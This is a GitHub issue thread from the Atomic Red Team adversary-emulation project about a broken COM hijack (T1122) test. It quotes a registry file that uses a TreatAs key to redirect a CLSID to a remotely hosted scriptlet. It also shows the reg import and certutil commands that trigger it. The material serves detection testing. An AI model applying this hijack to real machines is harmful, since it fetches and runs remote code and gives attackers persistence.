### ISSUE TITLE
T1122 COM Hijack Test CLSID is no longer viable.

### ISSUE THREAD

**Issue by caseysmithrc** [redcanaryco/atomic-red-team#455]
# Report
As reported in the Atomic Slack Chanel, Test T1122 COM hijack needs a new CLSID.

{372FCE38-4324-11D0-8810-00A0C903B83C} is no longer viable.

Probably the best plan forward is to just rewrite this test to look for reg mods of existing CLSIDs

references:
https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/

https://www.endgame.com/blog/technical-blog/how-hunt-detecting-persistence-evasion-com

**Comment by jberry777** [comment]
I replaced that CLSID with one for photo viewer, {FFE2A43C-56B9-4bf5-9A79-CC6D4285608A} and the test still failed to execute successfully. 

I expected calc.exe to execute when I opened a picture using photo viewer but nothing happened.

**Comment by caseysmithrc** [comment]
Can you describe more of what you did.  Replacing the CLSID is likely not enough to trigger a COM Hijack.  You will also likely need to a TreatAs Key to redirect execution.  Any additional details you can share would help.  In general, we prefer reporting any such CLSID hijack to the vendor first so that are aware, and have time to address,  before we publish something that is disruptive to their application. Thanks

**Comment by jberry777** [comment]
T1122's test COMHijack.reg has the following lines:

```
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct"
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}]
[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{372FCE38-4324-11D0-8810-00A0C903B83C}\TreatAs]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
```

Running the test:
```
c:\>reg import C:\path\COMHijack.reg
Completed Successfully
c:\>certutil.exe -CAInfo
Certutil: The system cannot find the file specified.
```

So I ran reg query and found the photo viewer CLSID and swapped it out for the two certutil.exe CLSIDs. I expected the 'TreatAs Key' statement to redirect the execution of photo viewer to the HKCU ScripletURL and execute calc.exe. When I used photo viewer to open an image, nothing happened.

**Comment by caseysmithrc** [comment]
Closing No longer Required.
